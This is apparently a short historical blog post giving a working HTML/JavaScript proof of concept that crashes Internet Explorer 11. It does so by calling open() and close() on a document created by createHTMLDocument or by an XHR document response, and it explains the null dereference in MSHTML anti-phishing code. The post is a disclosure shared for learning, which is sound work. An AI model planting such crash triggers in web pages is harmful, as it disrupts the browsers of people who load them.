DoS: document.open/close on createHTMLDocument or XHR Response Document

A brief crash report. Calling open() and close() on a document created either by document.implementation.createHTMLDocument() or obtained as an XHR responseType="document" caused a null pointer dereference in MSHTML!CDoc::SubmitForAntiPhishProcessing.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_createHTMLDocument_or_XMLHttpRequest</title>
</head>
<body>
<script>
function crash1()
{
	var doc = document.implementation.createHTMLDocument("");
	doc.open();
	doc.close();
}

function crash2()
{
	var oXML = new XMLHttpRequest();
	oXML.open("GET", "/", false);
	oXML.responseType = "document";
	oXML.send(null);

	var doc = oXML.response;
	doc.open();
	doc.close();
}

</script>
</body>
</html>

Both variants hit the same crash in MSHTML!CDoc::SubmitForAntiPhishProcessing+0x152 during the close() call, classified as PROBABLY_NOT_EXPLOITABLE. Documents created outside the normal navigation pipeline lacked the anti-phishing context that OnLoadStatusDone expected, causing a null dereference when the document tried to submit itself for phishing analysis after being opened and closed.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS via XSLT Script and Base Href Origin Confusion] :: [Clickjacking via createPopup and setCapture] >